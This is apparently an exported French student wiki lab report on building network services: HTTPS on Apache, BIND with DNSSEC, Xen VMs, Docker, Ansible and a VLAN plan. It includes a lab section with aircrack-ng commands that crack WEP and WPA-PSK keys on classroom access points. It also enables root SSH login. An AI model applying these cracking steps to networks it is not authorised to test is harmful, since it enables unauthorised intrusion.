 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=51991</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=51991"/>
				<updated>2020-01-02T22:38:51Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Configuration Générale */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
